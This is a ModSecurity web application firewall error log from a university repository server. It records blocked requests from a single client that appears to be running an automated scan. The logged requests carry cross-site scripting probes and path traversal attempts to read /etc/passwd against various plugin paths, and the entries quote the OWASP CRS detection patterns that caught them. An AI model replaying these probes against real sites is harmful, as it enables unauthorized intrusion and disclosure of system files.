[Tue Aug 29 11:56:05.555905 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAArC7e0AAAAW"]
[Tue Aug 29 11:56:05.737258 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAAqeFiwAAAAx"]
[Tue Aug 29 11:56:06.635543 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqeFjEAAAAx"]
[Tue Aug 29 11:56:07.704505 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAArB1wwAAAAV"]
[Tue Aug 29 11:56:07.751148 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAAqTv2QAAAAa"]
[Tue Aug 29 11:56:08.543537 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAArB1w4AAAAV"]
[Tue Aug 29 11:56:08.638676 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAArC7f8AAAAW"]
[Tue Aug 29 11:56:10.751222 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAAq5@NcAAAAK"]
[Tue Aug 29 11:56:11.590836 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAqeFkkAAAAx"]
[Tue Aug 29 11:56:11.731290 2023] [:error] [pid 2587] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAobT-4AAAAQ"]
[Tue Aug 29 11:56:11.731628 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16a8Co-f0AAApHRlQAAAAP"]
[Tue Aug 29 11:56:12.675638 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAqY6S4AAAAr"]
[Tue Aug 29 11:56:13.544964 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO16bcCo-f0AAApXgtUAAAAU"]
[Tue Aug 29 11:56:13.628232 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAocyfAAAAAR"]
[Tue Aug 29 11:56:14.730514 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16bsCo-f0AAArB1zAAAAAV"]
[Tue Aug 29 11:56:14.908023 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16bsCo-f0AAArB1zIAAAAV"]
[Tue Aug 29 11:56:15.699160 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAq3a8sAAAAI"]
[Tue Aug 29 11:56:16.775973 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16cMCo-f0AAArC7iwAAAAW"]
[Tue Aug 29 11:56:17.212605 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAAocyggAAAAR"]
[Tue Aug 29 11:56:17.536719 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq5@O4AAAAK"]
[Tue Aug 29 11:56:18.702547 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAocyg0AAAAR"]
[Tue Aug 29 11:56:19.640956 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAocyhAAAAAR"]
[Tue Aug 29 11:56:21.972446 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIASMAAAAX"]
[Tue Aug 29 11:56:22.040289 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAAqeFoEAAAAx"]
[Tue Aug 29 11:56:23.153681 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAAq5@QEAAAAK"]
[Tue Aug 29 11:56:23.535825 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArMmpIAAAAf"]
